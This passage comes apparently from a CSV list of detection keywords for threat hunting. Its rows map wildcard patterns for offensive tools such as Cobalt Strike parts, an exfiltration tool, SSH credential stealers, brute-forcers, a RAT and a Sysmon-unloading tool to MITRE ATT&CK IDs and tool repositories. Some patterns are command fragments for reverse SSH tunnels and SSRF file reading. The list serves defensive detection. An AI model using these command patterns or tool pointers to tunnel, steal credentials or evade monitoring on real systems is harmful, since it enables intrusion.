analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*src\unhook.c*,offensive_tool_keyword,cobaltstrike,Remove API hooks from a Beacon process.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/unhook-bof,1,0,N/A,10,10,240,61,2021-09-18T18:12:41Z,2021-01-13T02:20:44Z -*src\xmrig.cpp*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*srde dns -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srde https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srde_release dns -k *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srde_release https -i *,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*srvsvc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*ss -tunlp || netstat -tunlp*127.0.0.1*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*ssf.exe -D * -p * 127.0.0.1*,offensive_tool_keyword,ssfd,sets up a communication channel possibly for command and control (C2) or exfiltration purposes,T1218.011,TA0005,N/A,N/A,C2,https://github.com/securesocketfunneling/ssf,1,0,N/A,10,10,1502,240,2021-05-24T17:29:16Z,2015-06-01T17:34:23Z -*ssfd.exe -p *,offensive_tool_keyword,ssfd,sets up a communication channel possibly for command and control (C2) or exfiltration purposes,T1218.011,TA0005,N/A,N/A,C2,https://github.com/securesocketfunneling/ssf,1,0,N/A,10,10,1502,240,2021-05-24T17:29:16Z,2015-06-01T17:34:23Z -*ssh @ssh.*.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*ssh -N -R 4567:localhost:*root*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,0,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*ssh2john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ssh2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*sshame*,offensive_tool_keyword,sshame,tool to brute force SSH public-key authentication,T1110 - T1114 - T1112 - T1056,TA0001 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/HynekPetrak/sshame,1,0,N/A,N/A,1,65,15,2023-04-17T12:44:57Z,2019-08-25T16:50:56Z -*ssh-auditor*,offensive_tool_keyword,ssh-auditor,The best way to scan for weak ssh passwords on your network.,T1110 - T1114 - T1112 - T1056,TA0001 - TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/ncsa/ssh-auditor,1,0,N/A,N/A,6,582,88,2023-02-25T01:34:02Z,2016-11-08T22:47:38Z -*sshbrute.py*,offensive_tool_keyword,burpsuite,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*SSHBruteForce.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*sshkey_persistence.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sshLooterC*,offensive_tool_keyword,sshLooterC,script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.,T1003 - T1059 - T1083 - T1566 - T1558.003,TA0002 - TA0008 - TA0005,N/A,N/A,Credential Access,https://github.com/mthbernardes/sshLooterC,1,1,N/A,N/A,3,246,72,2023-06-08T21:12:10Z,2018-12-19T20:25:11Z -*ssh-mitm*,offensive_tool_keyword,ssh-mitm,An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.,T1040 - T1071 - T1552,TA0006 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/jtesta/ssh-mitm,1,1,N/A,N/A,10,1548,211,2021-07-02T02:17:26Z,2017-05-16T19:55:10Z -*sshmon*hunt*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*sshmon*kill*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*ssh-putty-brute -*,offensive_tool_keyword,SSH-PuTTY-login-bruteforcer,Turn PuTTY into an SSH login bruteforcing tool.,T1110.002 - T1059.003 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer,1,1,N/A,9,3,254,81,2020-11-21T07:10:26Z,2020-04-25T07:20:14Z -*ssh-putty-brute.ps1*,offensive_tool_keyword,SSH-PuTTY-login-bruteforcer,Turn PuTTY into an SSH login bruteforcing tool.,T1110.002 - T1059.003 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer,1,1,N/A,9,3,254,81,2020-11-21T07:10:26Z,2020-04-25T07:20:14Z -*SSH-PuTTY-login-bruteforcer*,offensive_tool_keyword,SSH-PuTTY-login-bruteforcer,Turn PuTTY into an SSH login bruteforcing tool.,T1110.002 - T1059.003 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer,1,1,N/A,9,3,254,81,2020-11-21T07:10:26Z,2020-04-25T07:20:14Z -*sshuttle -r *0.0.0.0/24*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sslstrip*,offensive_tool_keyword,sslstrip,sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.,T1557.001 - T1573 - T1559 - T1542 - T1552,TA0002 - TA0011 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/moxie0/sslstrip,1,1,N/A,N/A,10,1821,418,2021-05-29T01:53:12Z,2011-04-24T06:40:08Z -*SspiUacBypass.cpp*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*SspiUacBypass.exe*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*SspiUacBypass-main*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*SSploitEnumeration*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitEnumerationDomain*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitExecution_DynamicInvoke*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitExecution_Injection*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitLateralMovement*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitPersistence*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitPrivilegeEscalation*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*sspr2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*--ssrf --gopher --encode --scan-action filter-bypass*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*ssrfmap -r *.txt -p id -m readfiles*portscan*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SSRFmap*,offensive_tool_keyword,SSRFmap,SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.,T1210.001 - T1190 - T1191 - T1505 - T1213,TA0007 - TA0002 - TA0008 - TA0001,N/A,N/A,Web Attacks,https://github.com/swisskyrepo/SSRFmap,1,0,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -*ssrfmap.py*,offensive_tool_keyword,SSRFmap,Automatic SSRF fuzzer and exploitation tool,T1210 - T1211 - T1212 - T1574,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/swisskyrepo/SSRFmap,1,1,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -*StackCrypt-main*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.cpp*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.exe*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.sln*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.vcxproj*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*stage.obfuscate*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*stage_smartinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x64_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x64_strrep1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x86_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x86_strrep1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z 